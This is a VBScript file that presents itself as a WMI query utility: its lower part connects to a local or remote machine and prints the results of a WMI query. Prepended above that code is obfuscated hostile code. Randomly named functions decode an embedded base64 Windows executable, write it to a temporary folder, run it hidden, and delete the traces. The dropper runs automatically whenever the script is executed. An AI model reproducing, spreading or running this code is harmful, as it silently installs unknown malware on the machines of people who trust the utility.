Function yNowczUQV(gvOzICbRKDy)
	aBECIKknFYCX = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
		"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
		gvOzICbRKDy & "</B64DECODE>"
	Set ITLBoWeMA = CreateObject("MSXML2.DOMDocument.3.0")
	ITLBoWeMA.LoadXML(aBECIKknFYCX)
	yNowczUQV = ITLBoWeMA.selectsinglenode("B64DECODE").nodeTypedValue
	set ITLBoWeMA = nothing
End Function

Function iZJBZbXxOQnpIOj()
	VBKICTDah = "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"
	Dim bvTrrqAni
	Set bvTrrqAni = CreateObject("Scripting.FileSystemObject")
	Dim QoniMZcDD
	Dim aonWRMSgcNRK
	Set QoniMZcDD = bvTrrqAni.GetSpecialFolder(2)
	aonWRMSgcNRK = QoniMZcDD & "\" & bvTrrqAni.GetTempName()
	bvTrrqAni.CreateFolder(aonWRMSgcNRK)
	hEXVLOOfHGnYX = aonWRMSgcNRK & "\" & "BmVEyqDaWWkZ.exe"
	Dim JjYqfVGnpaWSJ
	Set JjYqfVGnpaWSJ = CreateObject("Wscript.Shell")
	rprcjdMCQnuoW = yNowczUQV(VBKICTDah)
	Set OqoDpLrBI = CreateObject("ADODB.Stream")
	OqoDpLrBI.Type = 1
	OqoDpLrBI.Open
	OqoDpLrBI.Write rprcjdMCQnuoW
	OqoDpLrBI.SaveToFile hEXVLOOfHGnYX, 2
	JjYqfVGnpaWSJ.run hEXVLOOfHGnYX, 0, true
	bvTrrqAni.DeleteFile(hEXVLOOfHGnYX)
	bvTrrqAni.DeleteFolder(aonWRMSgcNRK)
End Function

iZJBZbXxOQnpIOj




' Get WMI Object.
On Error Resume Next
Set objWbemLocator = CreateObject _
	("WbemScripting.SWbemLocator")

if Err.Number Then
	WScript.Echo vbCrLf & "Error # " & _
	             " " & Err.Description
End If
On Error GoTo 0	

On Error Resume Next

' If no errors then get Machine name, User name and Password.

Select Case WScript.Arguments.Count
	Case 2
		
		strComputer = Wscript.Arguments(0)
		strQuery = Wscript.Arguments(1)
		Set wbemServices = objWbemLocator.ConnectServer _ 
		      (strComputer,"Root\CIMV2")
	
      
		
	Case 4
		strComputer = Wscript.Arguments(0)
		strUsername = Wscript.Arguments(1)
		strPassword = Wscript.Arguments(2)
		strQuery = Wscript.Arguments(3)
		Set wbemServices = objWbemLocator.ConnectServer _ 
      			(strComputer,"Root\CIMV2",strUsername,strPassword)
				
       case 6
               strComputer = Wscript.Arguments(0)
	       	strUsername = Wscript.Arguments(1)
	        strPassword = Wscript.Arguments(2)
	       	strQuery = Wscript.Arguments(4)
	       	namespace = Wscript.Arguments(5)
	       	'namespace="Root\virtualization"
	       Set wbemServices = objWbemLocator.ConnectServer _ 
      		(strComputer,namespace,strUsername,strPassword)
	Case Else
		strMsg = "Error # in parameters passed"
		WScript.Echo strMsg
		WScript.Quit(0)
	
End Select



Set wbemServices = objWbemLocator.ConnectServer _ 
	(strComputer, namespace, strUsername, strPassword)

if Err.Number Then
	WScript.Echo vbCrLf & "Error # "  & _
	             " " & Err.Description
End If

On Error GoTo 0

On Error Resume Next

' Execute the given query.	
' WScript.Echo "Query is " & Wscript.Arguments(4)
Set colItems = wbemServices.ExecQuery(strQuery)

if Err.Number Then
	WScript.Echo vbCrLf & "Error # "  & _
             " " & Err.Description
End If
On Error GoTo 0

' Process the output.
i=0
For Each objItem in colItems
	if i=0 then
		header = ""
		For Each param in objItem.Properties_
			header = header & param.Name & vbTab
		Next
		WScript.Echo header
		i=1
	end if
	serviceData = ""
	For Each param in objItem.Properties_
		serviceData = serviceData & param.Value & vbTab
	Next
	WScript.Echo serviceData
Next

WScript.Quit(0)
